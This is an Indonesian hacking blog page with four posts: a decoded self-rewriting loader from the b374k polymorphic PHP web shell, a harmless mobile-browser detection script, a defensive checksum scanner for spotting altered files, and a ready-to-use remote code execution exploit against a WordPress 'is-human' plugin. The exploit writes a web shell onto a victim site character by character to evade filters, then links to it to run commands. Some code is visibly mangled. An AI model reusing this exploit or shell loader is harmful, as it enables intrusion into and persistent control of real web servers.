Archive RSS Login Forum

ROMANTISME Base64 b374k Polymorphic


Dear kawan-kawan…

Kalian pasti sudah pernah coba shell terupdatenya om ketek, b374k Polymorphic?
Dan kalau sudah punya hasil decode base 64 nya pasti udah sangat akrab sama script ini:





$x = "x2d60ef22";
$string = "s7EvyChQSE3OyFdQz85IzCwqVbe2twMA";
$s_pass = "0de664ecd2be02cdd54234a0d1229b43";
rebirth();
function love($me,$you){
$progress = NULL;
for($kiss = 0; $kiss < strlen($me); $kiss += strlen($you)){
for($hug = 0; $hug < strlen($you); $hug++){
$past = (int) ord(substr($me, $kiss+$hug, 1));
$present = (int) ord(substr($you, $hug, 1));
$sweet = $past + $present;
$progress .= $sweet . ".";
}
}
return base64_encode(gzdeflate(rtrim($progress, "."), 9));
}
hate(love($x,$string),$x);
function hate($me,$you){
$progress = NULL;
$problems = explode(".", gzinflate(base64_decode($me)));
for($mistake = 0; $mistake < count($problems); $mistake += strlen($you)){
for($hug = 0; $hug < strlen($you); $hug++){
$past = (int) $problems[$mistake+$hug];
$present = (int) ord(substr($you, $hug, 1));
$sweet = $past - $present;
$progress .= chr($sweet);
}
}
return $progress;
}
function make_love(){
$man = "man.".time().rand(0,50);
$woman = "woman".time().rand(51,100);
return "x" . substr(md5($man.$woman),0,8);
}
function rebirth()
{
$parent = basename($_SERVER['PHP_SELF']);
$egg = file_get_contents($parent);
$eggdate = filemtime($parent);
$checkup = preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
$egg = gzinflate(base64_decode($eggs[1][0]));
$get_embrio = preg_match_all("/\"([^\"]*)\"/", $egg, $eggs);
$adam = $eggs[1][0];
$one = make_love();
$embrio = $eggs[1][1];
$two = make_love();
$eve = $eggs[1][2];
$three = make_love();
$thepass = $eggs[1][3];
$before = hate($adam, $eve);
$after = love($before, $three);
$child = "\$" . $one . " = \"" . $after . "\";" .
"\$" . $two . " = \"" . $embrio . "\";" .
"\$" . $three . " = \"" . $three . "\";" .
"\$s_pass = \"" . $thepass ."\";" .
"eval(gzinflate(base64_decode(\$" . $two . ")));" .
"rebirth();" .
"eval(gzinflate(base64_decode(hate(\$". $one . ",\$" . $three . "))));";
$child = base64_encode(gzdeflate($child,9));
$child = "";
highlight_string($child);
if(!$any = getenv("TMP"))
if(!$any = getenv("TEMP"))
if(!$any = getenv("TMPDIR"))
{
if(is_writable("/tmp")) $any = "/tmp/"; else $any = ".";
}
if(file_put_contents($any . $three, $child))
{
rename($any . $three , $parent);
touch($parent, $eggdate);
if(is_file($any . $three))
unlink($any . $three);
}

}
?>



Kelihatannya romantis ya?? tapi tunggu dulu gak sebatas itu. Nih aku kasih sedikit tafsirannya.

Mengeksplorasi esensi cinta dalam karya-karya umum banyak dilakukan para penulis sastra, sementara mengeksplorasi esensi cinta dalam computer programming, sebuah kemahadasyatan teknologi modern. Makanya salut sekali sama programmer yg bermanuver seperti ini.

Read more »
di

Scripts sederhana deteksi Browser/Mobile Browser (bukan lwt userAgent)

ijin share kakak...
mudah2 bermamfaat bagi yg sedang bikin wapsite/wml

Langsung aja ya,,
PHP Code:
<?php/**
 * @author Jasman
 * @copyright 2010 Ihsana IT Solution
 * @version 10.2.4
 */

//mendeteksi Operamini if ((isset($_SERVER['HTTP_X_OPERAMINI_FEATURES'])) || (isset($_SERVER['HTTP_X_OPERAMINI_PHONE'])) ||
    (isset($_SERVER['HTTP_X_OPERAMINI_PHONE_UA'])))
{
    echo "Support PC Browser
        <br/>Operamini pada ponsel " . @$_SERVER['HTTP_X_OPERAMINI_PHONE'] .
        "<br/>User Agent Asli: " . @$_SERVER['HTTP_X_OPERAMINI_PHONE_UA'] .
        "<br/>User Agent Opera :" . @$_SERVER["HTTP_USER_AGENT"];
}//mendeteksi Standart browser dengan Wap Profileelseif (isset($_SERVER['HTTP_X_WAP_PROFILE']))
{
    echo "Standart Browser Wapsite.
    <br/>Dengan User Agent :" . @$_SERVER["HTTP_USER_AGENT"];
} elseif (preg_match('/wap|j2me|wml/'strtolower(@$_SERVER["HTTP_ACCEPT"])))
{
    echo "Browser Support Wapsite/WML
    <br/>Dengan User Agent :" . @$_SERVER["HTTP_USER_AGENT"];
} else
{
    echo "Support PC Browser
    <br/>User Agent : " . @$_SERVER["HTTP_USER_AGENT"];
}?>


Source : http://devilzc0de.org/forum/thread-14552.html
di
Label:

Scanner utk mengetahui perubahan file

Sistem kerjanya mirip antivirus,, yakni membandingkan ceksum database dengan ceksum file sekarang. setelah web ok 100%,, kita jalankan tool untuk membuat ceksum database,,

setelah itu coba test deface/bubuhi backdoor,, waktu ngescan akan nemuin tuh file termodifikasi/ditambah.

silahkan dikembangkan lagi mw pake cronjob biar jalan otomatis berkala atw tambahin notice via email atw botnet gimananya, terserah ini basic source codenya.. 

PHP Code:
<?php/**
 * @author      Jasman
 * @package        Function.Site
 * @subpackage     Application
 * @web http://www.pasbar.com/ and http://www.ihsana.com
 * @copyright    Copyright (C) 2011 Ihsana IT Solution. All rights reserved.
 * @license        GNU General Public License version 2 or later, see LICENSE.txt
 *
 * Scanner ini tidak bisa mendeteksi file yang telah dihapus.
 * untuk versi pertama cuma base source aja.
 * notice via email akan menyusul pada versi berikutnya.
 * insya Allah untuk plugin wp dan joomla cooming soon :D
 */
 error_reporting(0);/**
 * ini adalah tempat dimana folder yang akan discan
 */$dir dirname(__file__).DIRECTORY_SEPARATOR.'jz-cms/';/**
 * ini adalah tempat dimana folder untuk database ceksum,
 * letakan didalam folder yang tidak bisa dijangkau dari luar
 * ini akan menghapus httacces dan menulisnya lagi, usahakan pada folder kosong.
*/$dir_db dirname(__file__);



function scan_file($dir,$dir_db)
{
    $data null;
    if(file_exists($dir_db.DIRECTORY_SEPARATOR."data.db"))
    {
        ob_start();


        $fp fopen($dir_db.DIRECTORY_SEPARATOR."data.db","r");
        $str fread($fp,filesize($dir_db.DIRECTORY_SEPARATOR."data.db"));
        fclose($fp);
        $str explode("\n",$str);
        for($i 0$i count($str); $i++)
        {
            $str_db explode('=>',$str[$i]);
            $md5 trim($str_db[0]);
            $db[$md5]['file'] = trim($str_db[1]);
        }
        ob_end_flush();

        //start scan
        $path '';
        $stack[] = $dir;
        while($stack)
        {
            $thisdir = @array_pop($stack);
            if($dircont = @scandir($thisdir))
            {
                $i 0;

                while(isset($dircont[$i]))
                {
                    if($dircont[$i] !== '.' && $dircont[$i] !== '..')
                    {
                        $current_file $thisdir.DIRECTORY_SEPARATOR.$dircont[$i];
                        if(is_file($current_file))
                        {
                            $path[] = $thisdir.DIRECTORY_SEPARATOR.$dircont[$i];
                            $md5 = @md5_file($thisdir.DIRECTORY_SEPARATOR.$dircont[$i]);
                            $files[$md5]['hash'] = $md5;
                            $files[$md5]['file'] = $thisdir.DIRECTORY_SEPARATOR.$dircont[$i];
                            $files[$md5]['readable'] = is_readable($thisdir.DIRECTORY_SEPARATOR.$dircont[$i]);
                            $files[$md5]['writable'] = is_writable($thisdir.DIRECTORY_SEPARATOR.$dircont[$i]);
                            $files[$md5]['executable'] = is_executable($thisdir.DIRECTORY_SEPARATOR.$dircont[$i]);
                            $files[$md5]['modified'] = date("d-m-Y H:i:s",filemtime($thisdir.
                                DIRECTORY_SEPARATOR.$dircont[$i]));
                            $files[$md5]['created'] = date("d-m-Y H:i:s",filectime($thisdir.
                                DIRECTORY_SEPARATOR.$dircont[$i]));
                        } elseif(is_dir($current_file))
                        {
                            $stack[] = $current_file;
                        }
                    }

                    $i++;
                }
            }
        }

        $data array_diff_key($files,$db);
    }
    else
    {
        $data[md5('jasman')]['file'] = $dir_db.DIRECTORY_SEPARATOR."data.db";
        $data[md5('jasman')]['hash'] = '-';
        $data[md5('jasman')]['writable'] = 'Not Found.';
    }
    return $data;
}


function write_db_file($dir,$dir_db)
{
    $files null;

    $prot fopen($dir_db.DIRECTORY_SEPARATOR.'.htaccess','w');
    fwrite($prot,"<Files \"data.db\">\ndeny from all\n</Files>");
    fclose($prot);

    $fp fopen($dir_db.DIRECTORY_SEPARATOR."data.db","a+");
    $path '';
    $stack[] = $dir;
    while($stack)
    {
        $thisdir = @array_pop($stack);
        if($dircont = @scandir($thisdir))
        {
            $i 0;
            ob_start();
            while(isset($dircont[$i]))
            {
                if($dircont[$i] !== '.' && $dircont[$i] !== '..')
                {
                    $current_file $thisdir.DIRECTORY_SEPARATOR.$dircont[$i];
                    if(is_file($current_file))
                    {
                        $path[] = $thisdir.DIRECTORY_SEPARATOR.$dircont[$i];
                        $md5 = @md5_file($thisdir.DIRECTORY_SEPARATOR.$dircont[$i]);
                        $files[$md5]['file'] = $thisdir.DIRECTORY_SEPARATOR.$dircont[$i];
                        $files[$md5]['hash'] = $md5;
                        $files[$md5]['readable'] = is_readable($thisdir.DIRECTORY_SEPARATOR.$dircont[$i]);
                        $files[$md5]['writable'] = is_writable($thisdir.DIRECTORY_SEPARATOR.$dircont[$i]);
                        $files[$md5]['executable'] = is_executable($thisdir.DIRECTORY_SEPARATOR.$dircont[$i]);
                        fwrite($fp,$md5."=>".$thisdir.DIRECTORY_SEPARATOR.$dircont[$i]."\n");
                    } elseif(is_dir($current_file))
                    {
                        $stack[] = $current_file;
                    }
                }
                ob_end_flush();
                $i++;
            }
        }
    }
    fclose($fp);
    return $files;
}





echo '<p>Setelah semua design web beres, <a href="./scanner.php?act=ceksum">Buat Ceksum</a> untuk semua file.</p>';
echo '<p>Apakah ada perubahan pada file anda klik <a href="./scanner.php?act=scan">scan</a> untuk memeriksa.</p>';

if($_GET['act'] == 'ceksum')
{
    echo memory_get_usage();
    echo '<hr/><pre>';
    $str_files write_db_file($dir,$dir_db);
    print_r($str_files);
}

if($_GET['act'] == 'scan')
{

    $scanner = @scan_file($dir,$dir_db);
    $scannerx = @array_values($scanner);
    echo '
    <table border="1" style="border-collapse: collapse;">
    <tr>
        <td style="text-align: center; font-weight: bold;">No.</td>
        <td style="text-align: center; font-weight: bold;">File</td>
        <td style="text-align: center; font-weight: bold;">Writable</td>
        <td style="text-align: center; font-weight: bold;">Modified</td>
        <td style="text-align: center; font-weight: bold;">Created</td>
        <td style="text-align: center; font-weight: bold;">Md5</td>
    </tr>';
    $i 0;
    while($i count($scanner)):
        $x $i 1;
        echo '
    <tr>
        <td>'.$x.'</td>
        <td style="text-align: left; font-size: 75%;">'.$scannerx[$i]['file'].
            '</td>
        <td style="text-align: center; font-size: 95%;">'.$scannerx[$i]['writable'].
            '</td>
        <td style="text-align: left; font-size: 75%;">'.$scannerx[$i]['modified'].
            '</td>
        <td style="text-align: left; font-size: 75%;">'.$scannerx[$i]['created'].
            '</td>
        <td style="text-align: center; font-size: 95%;">'.$scannerx[$i]['hash'].
            '</td> 
    </tr>';
        $i++;
    endwhile;

    echo '
    </table>
    ';
}?>
**source belum rapi,, rapiin lagi ya,, ini salah satu rancangan module ihsana's cms beta. 
Source: http://devilzc0de.org/forum/thread-13982.html
di
Label:

Alternative Exploitasi Remote Code Execution

Berikut contoh Exploitasi PHP Code excute dimana pada target reguest yg masuk di filter beberapa function php seperti encoder/decoder, system, dll.
saya telah mencoba jg menggunakan string dasar chr namun tetap di blacklist. simimin mungkin udah belajar teknik exploitasi yg sebelumna. ini utk attak ke 3x lho.. ngakak
pikir dan berpikir akhirnya saya mencoba satu2 beberapa function php,, ternyata ada msh ada function yg tidak difilter yakni fwrite. kemudian saya mencoba bikin function fwrite namun gagal jg. kemudian saya test menulis bebrapa kata tanpa sintax. berhasil. smangat smangat smangat
Kesimpulan Jika bukan sintax php work
jadi bagaimana cara menulis file phpshell ke target Silahkan Pahami code RCE berikut:

PHP Code:
<?php/**
 * @author BlueBoyz
 * @copyright 2012 Www.ExploreCrew.Org
 * @version 11.3.2
 * @tutorial Alternative Remote Code Execution Vulnerability
 * @for education purphose only
 */


# <!-- start:function grabing -->function jHTTP($languagge='en_gb'$method='POST',$url,$data){
    $header = array('Accept-Language: '.$languagge.',en-us;q=0.7,en;q=0.3' );
    $ch curl_init();
    if ($method == 'POST'){
        curl_setopt($chCURLOPT_URL,$url);
        curl_setopt($chCURLOPT_POSTTRUE );
        curl_setopt($chCURLOPT_POSTFIELDS,$data );
    }elseif($method == 'GET'){
        curl_setopt($chCURLOPT_URL,$url.''.$data);
    }elseif($method == 'UPLOAD'){
        curl_setopt($chCURLOPT_URL,$url);
        curl_setopt($chCURLOPT_POSTFIELDS$data);    
    }
    curl_setopt($chCURLOPT_REFERER$url);

    curl_setopt($chCURLOPT_COOKIEFILEdirname(__FILE__).'/cookie.txt');
    curl_setopt($chCURLOPT_COOKIEJARdirname(__FILE__).'/cookie.txt'); 
 
    curl_setopt($chCURLOPT_RETURNTRANSFERTRUE);   
    curl_setopt($chCURLOPT_USERAGENT'Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0');
    curl_setopt($chCURLOPT_HTTPHEADER,$header) ;
    curl_setopt($chCURLOPT_FOLLOWLOCATIONTRUE);
    return curl_exec($ch);
    curl_close($ch); 
}# <!-- end:function grabing -->if(isset($_POST['exp'])){
 
    #mengambil link victim dari form, kemudian ditambah bug + prefix code [xcrew]. 
    $victim =$_POST['victim'].'/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options;[excute];error';
 
    #kita membuat perintah untuk menulis file xc.php dengan str <?php system($_GET['x']);
    $exploit = array (
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(60));fclose(\$fp)"// menulis = <
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(63));fclose(\$fp)",// menulis = ?
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'php');fclose(\$fp)"// menulis = php
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(13));fclose(\$fp)"// menulis spasi
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'system');fclose(\$fp)"// menulis system
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(40));fclose(\$fp)"// menulis (
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(36));fclose(\$fp)"// menulis $
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'_GET');fclose(\$fp)"// menulis _GET
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(91));fclose(\$fp)"// menulis [
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)"// menulis '
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,'x');fclose(\$fp)"// menulis x
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(39));fclose(\$fp)"// menulis '
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(93));fclose(\$fp)"// menulis ]
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(41));fclose(\$fp)"// menulis )
        "\$fp=fopen('xc'.chr(46).'php','a+');fwrite(\$fp,chr(59));fclose(\$fp)" // menulis ;
        // semuanya klw digabungin menjadi <?php system($_GET['x']);
    );
 
    #looping array di atas
    for($i=0;$i<count($exploit);$i++){
        #tukar prefix [xcrew] tersebut dengan yg didalam array
        $link str_replace('[xcrew]',$exploit[$i],$victim);
        jHTTP($languagge='en_gb''GET',$link,'');
    }
    $info '<a href="'.$_POST['victim'].'/wp-content/plugins/is-human/xc.php?x=uname -a">Go to Shell</a>';
}#membuat form HTML nya?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
    <meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
    <meta name="author" content="BlueBoyz" />
    <title>Exploit IS Human</title>
</head>
<body>
<form method="post" action="" >
<input type="text" name="victim" size="100" /> eg: http://webvictim.com/wordpress/ <br />
<input type="submit" name="exp" />
</form>
<?php echo @$info ?></body>
</html> 

source:http://devilzc0de.org/forum/thread-14286.html
di
Label: , ,
Subscribe to: Posts (Atom)
 
© Copyrigt 2012 | Design by YingZuckerberg | Powered by Blogger.com.